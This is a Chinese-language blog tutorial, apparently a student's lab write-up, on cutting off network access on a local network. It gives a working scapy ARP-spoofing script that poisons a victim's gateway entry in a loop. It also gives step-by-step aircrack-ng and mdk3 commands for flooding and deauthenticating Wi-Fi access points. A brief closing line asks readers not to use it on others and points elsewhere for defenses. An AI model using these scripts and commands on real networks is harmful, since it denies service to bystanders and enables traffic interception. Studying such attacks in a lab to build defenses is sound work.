有線網(wǎng)絡(luò)屏蔽
ARP官方釋意:地址解析協(xié)議,即ARP(Address Resolution Protocol),是根據(jù)獲取的一個(gè)。發(fā)送信息時(shí)將包含目標(biāo)IP地址的ARP請(qǐng)求廣播到局域網(wǎng)絡(luò)上的所有主機(jī),并接收返回消息,以此確定目標(biāo)的物理地址(mac);收到返回消息后將該IP地址和物理地址存入本機(jī)ARP緩存中并保留一定時(shí)間,下次請(qǐng)求時(shí)直接查詢ARP緩存以節(jié)約資源。

實(shí)驗(yàn)環(huán)境:
linux parrot(攻擊系統(tǒng))
Linux centos(被攻擊系統(tǒng))
實(shí)驗(yàn)語言:Python
Arp協(xié)議是網(wǎng)絡(luò)不可缺少的一部分,由于arp協(xié)議存在一些不可修復(fù)的漏洞所以駭客也經(jīng)常利用這個(gè)漏洞進(jìn)行局域網(wǎng)攻擊。攻擊大致分為兩種。(1)純粹的網(wǎng)絡(luò)攻擊,迫使受害者無法使用網(wǎng)絡(luò) (2)目的性攻擊,arp欺騙獲取局域網(wǎng)使用者的信息,盜取賬號(hào)密碼等敏感信息。
筆者的電腦是接入寢室網(wǎng)絡(luò)的,本來想使用真實(shí)電腦作為攻擊目標(biāo),鑒于室友正在使用,轉(zhuǎn)移到虛擬機(jī)進(jìn)行實(shí)驗(yàn)。
搭建實(shí)驗(yàn)環(huán)境

Linux parrot(攻擊系統(tǒng))

Linux centos(被攻擊系統(tǒng))
我們可以看到終端顯示的信息(網(wǎng)關(guān)一般是默認(rèn)的)
攻擊系統(tǒng)IP :192.168.163.146 MAC:00:0c:29:41:75:aa
被攻擊者IP:192.168.163.150 MAC:00:0c:29:0b:09:89
網(wǎng)絡(luò)測試依次使用兩臺(tái)機(jī)器ping百度顯示信息如下


此信息說明可以連接外網(wǎng),證明目前可以上網(wǎng)
使用攻擊系統(tǒng)掃描本網(wǎng)段的信息,使用到的工具fping

掃描到目標(biāo)IP使用arp -a命令確認(rèn)一下信息如下:

確認(rèn)無誤,我的局域網(wǎng)中網(wǎng)關(guān)以2結(jié)尾,所以我們展開192.168.163.2和192.
168.163.150之間的攻擊。
使用python的scapy模塊,編寫對(duì)應(yīng)的ARP包進(jìn)行發(fā)送,由于scapy有獨(dú)立的交互模式,我們就直接在終端中進(jìn)行編程。注意這里要進(jìn)入root權(quán)限
核心源代碼如下:
>>> a = ARP()
>>> a.show()
###[ ARP ]###
hwtype= 0x1
ptype= IPv4
hwlen= None
plen= None
op= who-has
hwsrc= 00:0c:29:41:75:aa
psrc= 192.168.163.146
hwdst= 00:00:00:00:00:00
pdst= 0.0.0.0
>>> a.psrc = '192.168.163.2'
>>> a.pdst = '192.168.163.150'
>>> send(a,loop=1)
正在攻擊目標(biāo)

驗(yàn)證:

Ping百度沒有反應(yīng),網(wǎng)關(guān)mac地址也被修改為攻擊機(jī)的MAC地址
Python代碼:
from scapy.all import *
import time
import random
pdst=str(input("目標(biāo)IP:"))
gw=str(input("網(wǎng)關(guān)IP:"))
a = ARP()
a.pdst = pdst
a.psrc = gw
a.hwsrc = 'b4:1e:89:20:43:A1'
while 1:
send(a,loop =0)
time.sleep(random.uniform(10,5))
無線網(wǎng)絡(luò)屏蔽
無線網(wǎng)絡(luò)攻擊相對(duì)上面的操作更加簡單,純工具攻擊方案。首先需要一個(gè)攻擊系統(tǒng),我選用parrot security系統(tǒng),因?yàn)檫@個(gè)系統(tǒng)整合的工具比較全,現(xiàn)對(duì)于kali來說雖然沒有什么較大的優(yōu)勢但是他的UI界面做的相當(dāng)?shù)暮谩?/p>
插入無線網(wǎng)卡

可以看到無線網(wǎng)卡被命名為了wlan0(因?yàn)橐话愣际沁@樣命名的),使用airmon-ng將無線網(wǎng)專為mon模式,在這之前最好把網(wǎng)卡mac地址改變一下(我也不知道有什么用總之這樣改感覺謹(jǐn)慎一些):
ifconfig wlan0 down
Macchanger -m MAC wlan0
ifconfg wlan0 up


airmon-ng start wlan0

接下來就可以使用wlan0mon進(jìn)行無線網(wǎng)的查看了,記住名字已經(jīng)變成wlan0mon了
使用airodump-ng wlan0mon或者wifete

打開就立刻掃到這兩個(gè)wifi,實(shí)驗(yàn)?zāi)繕?biāo)是ruijie(傳說中的我打我自己,吐槽一下銳捷客戶端,不能開wifi就算了連虛擬機(jī)都不能用,讓計(jì)算機(jī)專業(yè)的學(xué)生怎么搭建環(huán)境,雖然我不是計(jì)算機(jī)專業(yè))。
直接開始攻擊 mdk3 wlan0mon a -i MAC -s 速率

從連接狀況可以看出來有大量的mac地址請(qǐng)求建立連接,當(dāng)然我的手機(jī)已經(jīng)沒網(wǎng)了,大概就是0-20秒網(wǎng)絡(luò)變的卡頓,之后完全失去網(wǎng)絡(luò)通訊,當(dāng)然這只是一個(gè)AP的攻擊想要實(shí)現(xiàn)一定范圍的網(wǎng)絡(luò)中斷其實(shí)也就是一個(gè)命令的事。mdk3 wlan0mon d -w 白名單AP的mac -b黑名單AP的mac -c 信道。回車鍵敲下去后果可想而知,網(wǎng)卡可能會(huì)壞掉 哈哈…
這兩種攻擊方式有點(diǎn)不一樣,第一個(gè)是洪水攻擊利用大量的偽造mac迫使AP無法正常提供服務(wù),第二種是直接進(jìn)行解除認(rèn)證。
Aircrack-ng套裝是專門針對(duì)無線的一套工具,mdk3是專用的攻擊工具,除了上面的案例還有許多可研究的使用方法。
總結(jié):
兩種比較常見的局域網(wǎng)攻擊手段,單個(gè)拿出來看似確實(shí)沒什么,但是兩個(gè)組合在一起完全可以制造一個(gè)網(wǎng)絡(luò)屏蔽空間,對(duì)目標(biāo)造成一定的危害,雖然是局域網(wǎng),但也請(qǐng)不要隨意對(duì)他人使用,具體的防御方法在其他的文章中也有講述,ARP攻防那篇文章有講到如何預(yù)防ARP攻擊,無線攻擊預(yù)防方案只能在路由中進(jìn)行設(shè)置,有些到目前為止都還沒找到合適的防御方案。